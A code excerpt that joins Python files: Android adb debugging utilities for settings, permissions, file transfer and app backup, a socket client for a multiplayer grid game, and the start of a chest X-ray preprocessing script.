else:
value = 0
# Source: https://github.com/jaredsburrows/android-gif-example/blob/824c493285a2a2cf22f085662431cf0a7aa204b8/.travis.yml#L34
cmd1 = 'put global window_animation_scale %d' % value
cmd2 = 'put global transition_animation_scale %d' % value
cmd3 = 'put global animator_duration_scale %d' % value
execute_adb_shell_settings_command(cmd1)
execute_adb_shell_settings_command(cmd2)
execute_adb_shell_settings_command(cmd3)
def get_show_taps_state():
cmd = 'get system show_touches'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get current state of "show user taps" setting')
return _USER_PRINT_VALUE_UNKNOWN
if int(stdout.strip()) == 1:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_OFF
def toggle_show_taps(turn_on):
if turn_on:
value = 1
else:
value = 0
# Source: https://stackoverflow.com/a/32621809/434196
cmd = 'put system show_touches %d' % value
execute_adb_shell_settings_command(cmd)
def get_stay_awake_while_charging_state():
cmd = 'get global stay_on_while_plugged_in'
return_code, stdout, _ = execute_adb_shell_settings_command2(cmd)
if return_code != 0:
print_error('Failed to get "stay awake while plugged in" in the background setting')
return _USER_PRINT_VALUE_UNKNOWN
value = int(stdout.strip())
if value == 0:
return _USER_PRINT_VALUE_OFF
elif value == 7:
return _USER_PRINT_VALUE_ON
else:
return _USER_PRINT_VALUE_PARTIALLY_ON
# Source: https://developer.android.com/reference/android/provider/Settings.Global.html#STAY_ON_WHILE_PLUGGED_IN
def stay_awake_while_charging(turn_on):
if turn_on:
# 1 for USB charging, 2 for AC charging, 4 for wireless charging. Or them together to get 7.
value = 7
else:
value = 0
cmd1 = 'put global stay_on_while_plugged_in %d' % value
execute_adb_shell_settings_command_and_poke_activity_service(cmd1)
def input_text(text):
# Replace whitespaces to %s which gets translated by Android back to whitespaces.
cmd = 'input text %s' % text.replace(' ', '%s')
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to input text \"%s\"' % text)
def press_back():
cmd = 'input keyevent 4'
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to press back')
def open_url(url):
# Let's not do any URL encoding for now, if required, we will add that in the future.
parsed_url = urlparse(url=url)
if parsed_url.scheme is None or len(parsed_url.scheme) == 0:
parsed_url2 = urlparse(url=url, scheme='http')
url = parsed_url2.geturl()
cmd = 'am start -a android.intent.action.VIEW -d %s' % url
return_code, _, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to open url \"%s\"' % url)
def list_permission_groups():
cmd = 'pm list permission-groups'
return_code, stdout, _ = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to list permission groups')
else:
print_message(stdout)
def list_permissions(dangerous_only_permissions):
# -g is to group permissions by permission groups.
if dangerous_only_permissions:
# -d => dangerous only permissions
cmd = 'pm list permissions -g -d'
else:
cmd = 'pm list permissions -g'
return_code, stdout, stderr = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to list permissions: (stdout: %s, stderr: %s)' % (stdout, stderr))
else:
print_message(stdout)
# Creates a tmp file on Android device
def _create_tmp_file(filename_prefix=None, filename_suffix=None):
if filename_prefix is None:
filename_prefix = 'file'
if filename_suffix is None:
filename_suffix = 'tmp'
if filename_prefix.find('/') != -1:
print_error_and_exit('Filename prefix "%s" contains illegal character: "/"' % filename_prefix)
if filename_suffix.find('/') != -1:
print_error_and_exit('Filename suffix "%s" contains illegal character: "/"' % filename_suffix)
tmp_dir = '/data/local/tmp'
filepath_on_device = '%s/%s-%d.%s' % (
tmp_dir, filename_prefix, random.randint(1, 1000 * 1000 * 1000), filename_suffix)
if _file_exists(filepath_on_device):
# Retry if the file already exists
print_verbose('Tmp File %s already exists, trying a new random name' % filepath_on_device)
return _create_tmp_file(filename_prefix, filename_suffix)
# Create the file
return_code, stdout, stderr = execute_adb_shell_command2('touch %s' % filepath_on_device)
if return_code != 0:
print_error('Failed to create tmp file %s: (stdout: %s, stderr: %s)' % (filepath_on_device, stdout, stderr))
return None
# Make the tmp file world-writable or else, run-as command might fail to write on it.
return_code, stdout, stderr = execute_adb_shell_command2('chmod 666 %s' % filepath_on_device)
if return_code != 0:
print_error('Failed to chmod tmp file %s: (stdout: %s, stderr: %s)' % (filepath_on_device, stdout, stderr))
return None
return filepath_on_device
# Returns true if the file_path exists on the device, false if it does not exists or is inaccessible.
def _file_exists(file_path):
exists_cmd = "\"ls %s 1>/dev/null 2>/dev/null && echo exists\"" % file_path
stdout = execute_file_related_adb_shell_command(exists_cmd, file_path)
return stdout is not None and stdout.find('exists') != -1
def _is_sqlite_database(file_path):
return file_path.endswith('.db')
# Returns a fully-qualified permission group name.
def get_permission_group(args):
if args['contacts']:
return 'android.permission-group.CONTACTS'
elif args['phone']:
return 'android.permission-group.PHONE'
elif args['calendar']:
return 'android.permission-group.CALENDAR'
elif args['camera']:
return 'android.permission-group.CAMERA'
elif args['sensors']:
return 'android.permission-group.SENSORS'
elif args['location']:
return 'android.permission-group.LOCATION'
elif args['storage']:
return 'android.permission-group.STORAGE'
elif args['microphone']:
return 'android.permission-group.MICROPHONE'
elif args['sms']:
return 'android.permission-group.SMS'
else:
print_error_and_exit('Unexpected permission group: %s' % args)
return None
# Pass the full-qualified permission group name to this method.
def get_permissions_in_permission_group(permission_group):
# List permissions by group
cmd = 'pm list permissions -g'
return_code, stdout, stderr = execute_adb_shell_command2(cmd)
if return_code != 0:
print_error_and_exit('Failed to run command %s (stdout: %s, stderr: %s)' % (cmd, stdout, stderr))
return None
permission_output = stdout
# Remove ungrouped permissions section completely.
if 'ungrouped:' in permission_output:
permission_output, _ = permission_output.split('ungrouped:')
splits = permission_output.split('group:')
for split in splits:
if split.startswith(permission_group):
potential_permissions = split.split('\n')
# Ignore the first entry which is the group name
potential_permissions = potential_permissions[1:]
# Filter out empty lines.
permissions = filter(
lambda x: len(
x.strip()) > 0,
potential_permissions)
permissions = list(map(
lambda x: x.replace(
'permission:', ''), permissions))
print_message(
'Permissions in %s group are %s' %
(permission_group, permissions))
return permissions
return None
@ensure_package_exists3
def grant_or_revoke_runtime_permissions(package_name, action_grant, permissions):
_error_if_min_version_less_than(23)
if action_grant:
cmd = 'pm grant %s' % package_name
else:
cmd = 'pm revoke %s' % package_name
for permission in permissions:
execute_adb_shell_command(cmd + ' ' + permission)
def _get_all_packages(pm_cmd):
return_code, result, _ = execute_adb_shell_command2(pm_cmd)
if return_code != 0 or result is None:
print_error_and_exit('Empty output, something is wrong')
packages = []
for line in result.split('\n'):
_, package_name = line.split(':', 2)
packages.append(package_name)
return packages
def list_all_apps():
cmd = 'pm list packages'
packages = _get_all_packages(cmd)
print('\n'.join(packages))
def list_system_apps():
cmd = 'pm list packages -s'
packages = _get_all_packages(cmd)
print('\n'.join(packages))
def list_non_system_apps():
cmd = 'pm list packages -3'
packages = _get_all_packages(cmd)
print('\n'.join(packages))
def list_debug_apps():
cmd = 'pm list packages'
packages = _get_all_packages(cmd)
if _ASYNCIO_AVAILABLE:
method_to_call = _is_debug_package
params_list = packages
result_list = asyncio_helper.execute_in_parallel(method_to_call, params_list)
debug_packages = []
for (package_name, debuggable) in result_list:
if debuggable:
debug_packages.append(package_name)
print('\n'.join(debug_packages))
else:
print_message('Use python3 for faster execution of this call')
_list_debug_apps_no_async(packages)
def _list_debug_apps_no_async(packages):
debug_packages = []
count = 0
num_packages = len(packages)
for package in packages:
count += 1
print_verbose("Checking package: %d/%s" % (count, num_packages))
# No faster way to do this except to check each and every package individually
if _is_debug_package(package)[1]:
debug_packages.append(package)
print('\n'.join(debug_packages))
_REGEX_DEBUGGABLE = '(pkgFlags|flags).*DEBUGGABLE'
def _is_debug_package(app_name):
pm_cmd = 'dumpsys package %s' % app_name
grep_cmd = '(grep -c -E \'%s\' || true)' % _REGEX_DEBUGGABLE
app_info_dump = execute_adb_shell_command(pm_cmd, piped_into_cmd=grep_cmd)
if app_info_dump is None or not app_info_dump.strip().isnumeric():
print_error_and_exit('Unexpected output for %s | %s = %s' % (pm_cmd, grep_cmd, app_info_dump))
return None, False
return app_name, int(app_info_dump.strip()) > 0
def list_allow_backup_apps():
cmd = 'pm list packages'
packages = _get_all_packages(cmd)
if _ASYNCIO_AVAILABLE:
method_to_call = _is_allow_backup_package
params_list = packages
result_list = asyncio_helper.execute_in_parallel(method_to_call, params_list)
debug_packages = []
for (package_name, debuggable) in result_list:
if debuggable:
debug_packages.append(package_name)
print('\n'.join(debug_packages))
else:
print_message('Use python3 for faster execution of this call')
_list_allow_backup_apps_no_async(packages)
def _list_allow_backup_apps_no_async(packages):
debug_packages = []
count = 0
num_packages = len(packages)
for package in packages:
count += 1
print_verbose("Checking package: %d/%s" % (count, num_packages))
# No faster way to do this except to check each and every package individually
if _is_allow_backup_package(package)[1]:
debug_packages.append(package)
print('\n'.join(debug_packages))
_REGEX_BACKUP_ALLOWED = '(pkgFlags|flags).*ALLOW_BACKUP'
def _is_allow_backup_package(app_name):
pm_cmd = 'dumpsys package %s' % app_name
grep_cmd = '(grep -c -E \'%s\' || true)' % _REGEX_BACKUP_ALLOWED
app_info_dump = execute_adb_shell_command(pm_cmd, piped_into_cmd=grep_cmd)
if app_info_dump is None or not app_info_dump.strip().isnumeric():
print_error_and_exit('Unexpected output for %s | %s = %s' % (pm_cmd, grep_cmd, app_info_dump))
return None, False
return app_name, int(app_info_dump.strip()) > 0
# Source: https://developer.android.com/reference/android/app/usage/UsageStatsManager#STANDBY_BUCKET_ACTIVE
_APP_STANDBY_BUCKETS = {
10: 'active',
20: 'working',
30: 'frequent',
40: 'rare',
}
# Source: https://developer.android.com/preview/features/power#buckets
@ensure_package_exists
def get_standby_bucket(package_name):
_error_if_min_version_less_than(28)
cmd = 'am get-standby-bucket %s' % package_name
result = execute_adb_shell_command(cmd)
if result is None:
print_error_and_exit(_USER_PRINT_VALUE_UNKNOWN)
print_verbose('App standby bucket for \"%s\" is %s' %(
package_name, _APP_STANDBY_BUCKETS.get(int(result), _USER_PRINT_VALUE_UNKNOWN)))
print(_APP_STANDBY_BUCKETS.get(int(result), _USER_PRINT_VALUE_UNKNOWN))
@ensure_package_exists2
def set_standby_bucket(package_name, mode):
_error_if_min_version_less_than(28)
cmd = 'am set-standby-bucket %s %s' % (package_name, mode)
result = execute_adb_shell_command(cmd)
if result is not None: # Expected
print_error_and_exit(result)
def calculate_standby_mode(args):
if args['active']:
return 'active'
elif args['working_set']:
return 'working_set'
elif args['frequent']:
return 'frequent'
elif args['rare']:
return 'rare'
else:
raise ValueError('Illegal argument: %s' % args)
# Source: https://developer.android.com/preview/features/power
@ensure_package_exists2
def apply_or_remove_background_restriction(package_name, set_restriction):
_error_if_min_version_less_than(28)
appops_cmd = 'cmd appops set %s RUN_ANY_IN_BACKGROUND %s' % (
package_name, 'ignore' if set_restriction else 'allow')
execute_adb_shell_command(appops_cmd)
def list_directory(file_path, long_format, recursive, include_hidden_files):
cmd_prefix = 'ls'
if long_format:
cmd_prefix += ' -l'
if recursive:
cmd_prefix += ' -R'
if include_hidden_files:
cmd_prefix += ' -a'
cmd = '%s %s' % (cmd_prefix, file_path)
print_message(execute_file_related_adb_shell_command(cmd, file_path))
def delete_file(file_path, force, recursive):
cmd_prefix = 'rm'
if force:
cmd_prefix += ' -f'
if recursive:
cmd_prefix += ' -r'
cmd = '%s %s' % (cmd_prefix, file_path)
print_message(execute_file_related_adb_shell_command(cmd, file_path))
# Limitation: This command will only do run-as for the src file so, if a file is being copied from pkg1 to pkg2
# on a non-rooted device with both pkg1 and pkg2 being debuggable, this will fail. This can be improved by
# first copying the file to /data/local/tmp but as of now, I don't think that's required.
def move_file(src_path, dest_path, force):
cmd_prefix = 'mv'
if force:
cmd_prefix += '-f'
cmd = '%s %s %s' % (cmd_prefix, src_path, dest_path)
if get_package(src_path) and get_package(dest_path) and get_package(src_path) != get_package(dest_path):
print_error_and_exit('Cannot copy a file from one package into another, copy it via /data/local/tmp instead')
return
file_path = None
if get_package(src_path):
file_path = src_path
elif get_package(dest_path):
file_path = dest_path
move_stdout = execute_file_related_adb_shell_command(cmd, file_path)
if move_stdout:
print_message(move_stdout)
print_verbose('Moved "%s" to "%s"' % (src_path, dest_path))
# Copies from remote_file_path on Android to local_file_path on the disk
# local_file_path can be None
def pull_file(remote_file_path, local_file_path, copy_ancillary=False):
if not _file_exists(remote_file_path):
print_error_and_exit('File %s does not exist' % remote_file_path)
if local_file_path is None:
local_file_path = remote_file_path.split('/')[-1]
print_verbose('Local file path not provided, using \"%s\" for that' % local_file_path)
remote_file_path_package = get_package(remote_file_path)
if remote_file_path_package is None and not root_required_to_access_file(remote_file_path):
print_verbose('File %s is not inside a package, no temporary file required' % remote_file_path_package)
pull_cmd = 'pull %s %s' % (remote_file_path, local_file_path)
execute_adb_command2(pull_cmd)
else:
# First copy the files to sdcard, then pull them out, and then delete them from sdcard.
tmp_file = _create_tmp_file()
cp_cmd = 'cp -r %s %s' % (remote_file_path, tmp_file)
execute_file_related_adb_shell_command(cp_cmd, remote_file_path)
pull_cmd = 'pull %s %s' % (tmp_file, local_file_path)
execute_adb_command2(pull_cmd)
del_cmd = 'rm -r %s' % tmp_file
execute_adb_shell_command(del_cmd)
if os.path.exists(local_file_path):
print_message('Copied remote file \"%s\" to local file \"%s\" (Size: %d bytes)' % (
remote_file_path,
local_file_path,
os.path.getsize(local_file_path)))
else:
print_error_and_exit('Failed to copy remote file \"%s\" to local file \"%s\"' % (
remote_file_path,
local_file_path))
if _is_sqlite_database(remote_file_path):
# Copy temporary Sqlite files
# Source :https://ashishb.net/all/android-the-right-way-to-pull-sqlite-database-from-the-device/
for suffix in ['wal', 'journal', 'shm']:
tmp_db_file = '%s-%s' % (remote_file_path, suffix)
if not _file_exists(tmp_db_file):
continue
if copy_ancillary:
pull_file(tmp_db_file, '%s-%s' %(local_file_path, suffix), copy_ancillary=True)
else:
print_error('File \"%s\" has an ancillary file \"%s\" which should be copied.\nSee %s for details'
% (remote_file_path, tmp_db_file,
'https://ashishb.net/all/android-the-right-way-to-pull-sqlite-database-from-the-device/'))
# Limitation: It seems that pushing to a directory on some versions of Android fail silently.
# It is safer to push to a full path containing the filename.
def push_file(local_file_path, remote_file_path):
if not os.path.exists(local_file_path):
print_error_and_exit('Local file %s does not exist' % local_file_path)
if os.path.isdir(local_file_path):
print_error_and_exit('This tool does not support pushing a directory yet' % local_file_path)
# First push to tmp file in /data/local/tmp and then move that
tmp_file = _create_tmp_file()
push_cmd = 'push %s %s' % (local_file_path, tmp_file)
# "mv" from /data/local/tmp with run-as <app_id> does not always work even when the underlying
# dir has mode set to 777. Therefore, do a two-step cp and rm.
cp_cmd = 'cp %s %s' % (tmp_file, remote_file_path)
rm_cmd = 'rm %s' % tmp_file
return_code, _, stderr = execute_adb_command2(push_cmd)
if return_code != 0:
print_error_and_exit('Failed to push file, error: %s' % stderr)
return
execute_file_related_adb_shell_command(cp_cmd, remote_file_path)
execute_adb_shell_command(rm_cmd)
def cat_file(file_path):
cmd_prefix = 'cat'
cmd = '%s %s' % (cmd_prefix, file_path)
cat_stdout = execute_file_related_adb_shell_command(cmd, file_path)
# Don't print "None" for an empty file
if cat_stdout:
print_message(execute_file_related_adb_shell_command(cmd, file_path))
# Source: https://stackoverflow.com/a/25398877
@ensure_package_exists
def launch_app(app_name):
adb_shell_cmd = 'monkey -p %s -c android.intent.category.LAUNCHER 1' % app_name
execute_adb_shell_command(adb_shell_cmd)
@ensure_package_exists
def stop_app(app_name):
# Below API 21, stop does not kill app in the foreground.
# Above API 21, it seems it does.
if get_device_android_api_version() < 21:
force_stop(app_name)
else:
adb_shell_cmd = 'am kill %s' % app_name
execute_adb_shell_command(adb_shell_cmd)
def _regex_extract(regex, data):
regex_object = re.search(regex, data, re.IGNORECASE)
if regex_object is None:
return None
else:
return regex_object.group(1)
# adb shell pm dump <app_name> produces about 1200 lines, mostly useless,
# compared to this.
@ensure_package_exists
def print_app_info(app_name):
app_info_dump = execute_adb_shell_command('dumpsys package %s' % app_name)
version_code = _regex_extract('versionCode=(\\d+)?', app_info_dump)
version_name = _regex_extract('versionName=([\\d.]+)?', app_info_dump)
min_sdk_version = _regex_extract('minSdk=(\\d+)?', app_info_dump)
target_sdk_version = _regex_extract('targetSdk=(\\d+)?', app_info_dump)
max_sdk_version = _regex_extract('maxSdk=(\\d+)?', app_info_dump)
installer_package_name = _regex_extract('installerPackageName=(\\S+)?', app_info_dump)
is_debuggable = re.search(
_REGEX_DEBUGGABLE,
app_info_dump,
re.IGNORECASE) is not None
msg = ''
msg += 'App name: %s\n' % app_name
msg += 'Version: %s\n' % version_name
msg += 'Version Code: %s\n' % version_code
msg += 'Is debuggable: %r\n' % is_debuggable
msg += 'Min SDK version: %s\n' % min_sdk_version
msg += 'Target SDK version: %s\n' % target_sdk_version
if max_sdk_version is not None:
msg += 'Max SDK version: %s\n' % max_sdk_version
if get_device_android_api_version() >= 23:
msg += _get_permissions_info_above_api_23(app_info_dump)
else:
msg += _get_permissions_info_below_api_23(app_info_dump)
msg += 'Installer package name: %s\n' % installer_package_name
print_message(msg)
# API < 23 have no runtime permissions
def _get_permissions_info_below_api_23(app_info_dump):
install_time_permissions_regex = re.search('grantedPermissions:(.*)', app_info_dump,
re.IGNORECASE | re.DOTALL)
if install_time_permissions_regex is None:
install_time_permissions_string = []
else:
install_time_permissions_string = install_time_permissions_regex.group(1).split('\n')
install_time_granted_permissions = []
install_time_permissions_string = filter(None, install_time_permissions_string)
for permission_string in install_time_permissions_string:
install_time_granted_permissions.append(permission_string)
permissions_info_msg = ''
if len(install_time_granted_permissions) > 0:
permissions_info_msg += 'Install time granted permissions:\n%s\n\n' % '\n'.join(
install_time_granted_permissions)
return permissions_info_msg
# API 23 and have runtime permissions
def _get_permissions_info_above_api_23(app_info_dump):
requested_permissions_regex = \
re.search('requested permissions:(.*?)install permissions:', app_info_dump, re.IGNORECASE | re.DOTALL)
if requested_permissions_regex is None:
requested_permissions_regex = re.search('requested permissions:(.*?)runtime permissions:', app_info_dump,
re.IGNORECASE | re.DOTALL)
if requested_permissions_regex is None:
requested_permissions = [] # No permissions requested by the app.
else:
requested_permissions = requested_permissions_regex.group(1).split('\n')
install_time_permissions_regex = re.search('install permissions:(.*?)runtime permissions:', app_info_dump,
re.IGNORECASE | re.DOTALL)
if install_time_permissions_regex is None:
install_time_permissions_string = []
else:
install_time_permissions_string = install_time_permissions_regex.group(1).split('\n')
# Remove empty entries
requested_permissions = list(filter(None, requested_permissions))
install_time_permissions_string = filter(None, install_time_permissions_string)
install_time_granted_permissions = []
install_time_denied_permissions = [] # This will most likely remain empty
for permission_string in install_time_permissions_string:
if permission_string.find('granted=true') >= 0:
permission, _ = permission_string.split(':')
install_time_granted_permissions.append(permission)
elif permission_string.find('granted=false') >= 0:
permission, _ = permission_string.split(':')
install_time_denied_permissions.append(permission)
runtime_denied_permissions = []
runtime_granted_permissions = []
for permission in requested_permissions:
if permission in install_time_granted_permissions or permission in install_time_denied_permissions:
continue
granted_pattern = '%s: granted=true' % permission
denied_pattern = '%s: granted=false' % permission
if app_info_dump.find(granted_pattern) >= 0:
runtime_granted_permissions.append(permission)
elif app_info_dump.find(denied_pattern) >= 0:
runtime_denied_permissions.append(permission)
runtime_not_granted_permissions = list(filter(
lambda p: p not in runtime_granted_permissions and
p not in runtime_denied_permissions and
p not in install_time_granted_permissions and
p not in install_time_denied_permissions, requested_permissions))
permissions_info_msg = ''
permissions_info_msg += '\nPermissions:\n\n'
if len(install_time_granted_permissions) > 0:
permissions_info_msg += 'Install time granted permissions:\n%s\n\n' % '\n'.join(
install_time_granted_permissions)
if len(install_time_denied_permissions) > 0:
permissions_info_msg += 'Install time denied permissions:\n%s\n\n' % '\n'.join(
install_time_denied_permissions)
if len(runtime_granted_permissions) > 0:
permissions_info_msg += 'Runtime granted permissions:\n%s\n\n' % '\n'.join(
runtime_granted_permissions)
if len(runtime_denied_permissions) > 0:
permissions_info_msg += 'Runtime denied permissions:\n%s\n\n' % '\n'.join(
runtime_denied_permissions)
if len(runtime_not_granted_permissions) > 0:
permissions_info_msg += 'Runtime Permissions not granted and not yet requested:\n%s\n\n' % '\n'.join(
runtime_not_granted_permissions)
return permissions_info_msg
def _get_apk_path(app_name):
adb_shell_cmd = 'pm path %s' % app_name
result = execute_adb_shell_command(adb_shell_cmd)
apk_path = result.split(':', 2)[1]
return apk_path
@ensure_package_exists
def print_app_path(app_name):
apk_path = _get_apk_path(app_name)
print_verbose('Path for %s is %s' % (app_name, apk_path))
print_message(apk_path)
@ensure_package_exists
def print_app_signature(app_name):
apk_path = _get_apk_path(app_name)
# Copy apk to a temp file on the disk
tmp_apk_file = tempfile.NamedTemporaryFile(prefix=app_name, suffix='.apk')
with tmp_apk_file:
tmp_apk_file_name = tmp_apk_file.name
adb_cmd = 'pull %s %s' % (apk_path, tmp_apk_file_name)
return_code, _, stderr = execute_adb_command2(adb_cmd)
if return_code != 0:
print_error_and_exit('Failed to pull file %s, stderr: %s' % (apk_path, stderr))
return
dir_of_this_script = os.path.split(__file__)[0]
apk_signer_jar_path = os.path.join(dir_of_this_script, 'apksigner.jar')
if not os.path.exists(apk_signer_jar_path):
print_error_and_exit('apksigner.jar is missing, your adb-enhanced installation is corrupted')
print_signature_cmd = 'java -jar %s verify --print-certs %s' % (apk_signer_jar_path, tmp_apk_file_name)
print_verbose('Executing command %s' % print_signature_cmd)
ps1 = subprocess.Popen(print_signature_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in ps1.stdout:
line = line.decode('utf-8').strip()
print_message(line)
for line in ps1.stderr:
line = line.decode('utf-8').strip()
print_error(line)
# Uses abe.jar taken from https://sourceforge.net/projects/adbextractor/
@ensure_package_exists2
def perform_app_backup(app_name, backup_tar_file):
# TODO: Add a check to ensure that the screen is unlocked
password = '00'
print_verbose('Performing backup to backup.ab file')
print_message('you might have to confirm the backup manually on your device\'s screen, enter \"%s\" as password...' % password)
def backup_func():
# Create backup.ab
adb_backup_cmd = 'backup -noapk %s' % app_name
execute_adb_command2(adb_backup_cmd)
backup_thread = threading.Thread(target=backup_func)
backup_thread.start()
while _get_top_activity_data()[1].find('com.android.backupconfirm') == -1:
print_verbose('Waiting for the backup activity to start')
time.sleep(1)
time.sleep(1)
# Commented out since this does not always work and can sometimes lead to random clicks on some devices
# making backups impossible.
# # Tap the backup button
# # Get the location of "backup data" button and tap it.
# window_size_x, window_size_y = _get_window_size()
# # These numbers are purely derived from heuristics and can be improved.
# _perform_tap(window_size_x - 200, window_size_y - 100)
backup_thread.join(timeout=10)
if backup_thread.is_alive():
print_error('Backup failed in first attempt, trying again...')
# _perform_tap(window_size_x - 200, window_size_y - 100)
backup_thread.join(timeout=10)
if backup_thread.is_alive():
print_error_and_exit('Backup failed')
# Convert ".ab" to ".tar" using Android Backup Extractor (ABE)
try:
dir_of_this_script = os.path.split(__file__)[0]
abe_jar_path = os.path.join(dir_of_this_script, 'abe.jar')
if not os.path.exists(abe_jar_path):
print_error_and_exit('Abe.jar is missing, your adb-enhanced installation is corrupted')
abe_cmd = 'java -jar %s unpack backup.ab %s %s' % (abe_jar_path, backup_tar_file, password)
print_verbose('Executing command %s' % abe_cmd)
ps = subprocess.Popen(abe_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps.communicate()
if ps.returncode == 0:
print_message('Successfully backed up data of app %s to %s' % (app_name, backup_tar_file))
else:
print_error('Failed to convert backup.ab to tar file. Please ensure that it is not password protected')
finally:
print_verbose('Deleting backup.ab')
ps = subprocess.Popen('rm backup.ab', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps.communicate()
def perform_install(file_path):
print_verbose('Installing %s' % file_path)
# -r: replace existing application
return_code, _, stderr = execute_adb_command2('install -r %s' % file_path)
if return_code != 0:
print_error('Failed to install %s, stderr: %s' % (file_path, stderr))
@ensure_package_exists
def perform_uninstall(app_name):
print_verbose('Uninstalling %s' % app_name)
return_code, _, stderr = execute_adb_command2('uninstall %s' % app_name)
if return_code != 0:
print_error('Failed to uninstall %s, stderr: %s' % (app_name, stderr))
def _get_window_size():
adb_cmd = 'shell wm size'
_, result, _ = execute_adb_command2(adb_cmd)
if result is None:
return -1, -1
regex_data = re.search('size: ([0-9]+)x([0-9]+)', result)
if regex_data is None:
return -1, -1
return int(regex_data.group(1)), int(regex_data.group(2))
def _perform_tap(x, y):
adb_shell_cmd = 'input tap %d %d' % (x, y)
execute_adb_shell_command2(adb_shell_cmd)
# Deprecated
def execute_adb_shell_settings_command(settings_cmd, device_serial=None):
_error_if_min_version_less_than(19, device_serial=device_serial)
return execute_adb_shell_command('settings %s' % settings_cmd, device_serial=device_serial)
def execute_adb_shell_settings_command2(settings_cmd, device_serial=None):
_error_if_min_version_less_than(19)
return execute_adb_shell_command2('settings %s' % settings_cmd, device_serial)
def execute_adb_shell_settings_command_and_poke_activity_service(settings_cmd):
return_value = execute_adb_shell_settings_command(settings_cmd)
_poke_activity_service()
return return_value
def execute_adb_shell_command_and_poke_activity_service(adb_cmd):
return_value = execute_adb_shell_command(adb_cmd)
_poke_activity_service()
return return_value
def _poke_activity_service():
return execute_adb_shell_command(get_update_activity_service_cmd())
def _error_if_min_version_less_than(min_acceptable_version, device_serial=None):
api_version = get_device_android_api_version(device_serial)
if api_version < min_acceptable_version:
cmd = ' '.join(sys.argv[1:])
print_error_and_exit(
'\"%s\" can only be executed on API %d and above, your device version is %d' %
(cmd, min_acceptable_version, api_version))
def _is_emulator():
qemu = get_adb_shell_property('ro.kernel.qemu')
return qemu is not None and qemu.strip() == '1'
|
client.py
|
import socket
from multiprocessing import Queue
from threading import Thread
from classes.inventory import Inventory, _ITEMS
from classes.player import Player
from common.listtools import find
from common.vec import Vec2d
_max_buffer_size = 4096
def parse_response_array(s: str) -> []:
translator = str.maketrans('', '', '[]\n')
data = s.translate(translator).strip().split(',')
return data
def clamp(value, max_val):
assert isinstance(value, type(max_val))
return (value + max_val) % max_val
class Client:
player: Player = None
sock = socket.socket()
port = -1
team = ''
mapSize = Vec2d(0, 0)
host: str
slotsLeft: int
responses = Queue()
messages = Queue()
def __init__(self, port: int, name: str, host: str):
self.r_th = Thread(target=self.read, args=(self.sock, self.responses, self.messages))
self.host = host
self.port = port
self.team = name
self.player = Player(pid=0, pos=Vec2d(0, 0))
def connect(self):
self.sock.connect((self.host, self.port))
self.r_th.daemon = True
self.r_th.start()
@staticmethod
def read(sock: socket, responses: Queue, messages: Queue):
buf = ''
while True:
buf += sock.recv(_max_buffer_size).decode()
if len(buf) == 0:
return
while buf.find('\n') is not -1:
res, buf = buf.split('\n', maxsplit=1)
if res.split(maxsplit=1)[0] == 'message':
# print(f'received msg [{res}]')
messages.put(res)
else:
# print(f'received response [{res}]')
responses.put(res)
def write(self, data):
# print(f' sending [{data}]')
if not data.endswith('\n'):
data += '\n'
self.sock.send(data.encode())
def terminate(self):
self.sock.close()
def get_initial_data(self):
self.slotsLeft = int(self.responses.get())
x, y = self.responses.get().split(' ')
self.mapSize = Vec2d(int(x), int(y))
def move_forward(self):
# print(f'Forward in {self.player.orientation} direction')
self.write('Forward')
if self.responses.get() != 'ok':
exit(0)
if self.player.orientation == 0: # NORTH
# print('NORTH')
self.player.position.set_y(clamp(self.player.position.y() + 1, self.mapSize.y()))
elif self.player.orientation == 2: # SOUTH
# print('SOUTH')
self.player.position.set_y(clamp(self.player.position.y() - 1, self.mapSize.y()))
elif self.player.orientation == 1: # EAST
# print('EAST')
self.player.position.set_x(clamp(self.player.position.x() + 1, self.mapSize.x()))
elif self.player.orientation == 3: # WEST
# print('WEST')
self.player.position.set_x(clamp(self.player.position.x() - 1, self.mapSize.x()))
def turn_right(self):
# print('Right')
self.write('Right')
if self.responses.get() != 'ok':
exit(0)
self.player.orientation = (self.player.orientation + 1 + 4) % 4
def turn_left(self):
# print('Left')
self.write('Left')
if self.responses.get() != 'ok':
exit(0)
self.player.orientation = (self.player.orientation - 1 + 4) % 4
def look(self):
self.write('Look')
data = parse_response_array(self.responses.get())
self.player.vision = []
for s in data:
vision = Inventory([0]*len(_ITEMS))
segment = s.strip().split(' ')
for key in segment:
if find(vision.keys(), key=lambda x: x == key) is not None:
vision[key] += 1
self.player.vision.append(vision)
def get_inventory(self):
self.write('Inventory')
data = parse_response_array(self.responses.get())
for s in data:
item, val = s.strip().split(' ')
self.player.inventory[item] = int(val)
def send_information(self):
text = f'{self.team};{self.player.to_str()}'
self.broadcast(text)
def broadcast(self, text: str):
self.write('Broadcast ' + text)
if self.responses.get() != 'ok':
exit(0)
def get_remaining_slots(self):
self.write('Connect_nbr')
self.slotsLeft = int(self.responses.get())
def fork(self):
if self.slotsLeft > 0:
self.write('Fork')
if self.responses.get() != 'ok':
exit(0)
def eject(self):
self.write('Eject')
if self.responses.get() != 'ok':
exit(0)
def take(self, item: str) -> bool:
self.write('Take ' + item)
res = self.responses.get()
if res == 'dead':
exit(0)
if res == 'ok':
self.player.inventory[item] += 1
return True
return False
def set(self, item: str):
if self.player.inventory[item] <= 0:
return
self.write('Set ' + item)
if self.responses.get().strip() == 'ok':
self.player.inventory[item] -= 1
self.player.vision[0][item] += 1
else:
exit(0)
def incantation(self):
self.write('Incantation')
response = self.responses.get()
if response != 'ok':
exit(0)
self.player.timeout = 300
|
crop_img.py
|
import numpy as np
from skimage import io, color, exposure, img_as_float, transform, util
from matplotlib import pyplot as plt
import pathlib
import cv2
import multiprocessing
import time
import argparse
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator
import os
"""
This script will preprocess a given image dataset. For each chest x-ray image,
the chest region will be detected and segmented with pretrained U-Net. The lung
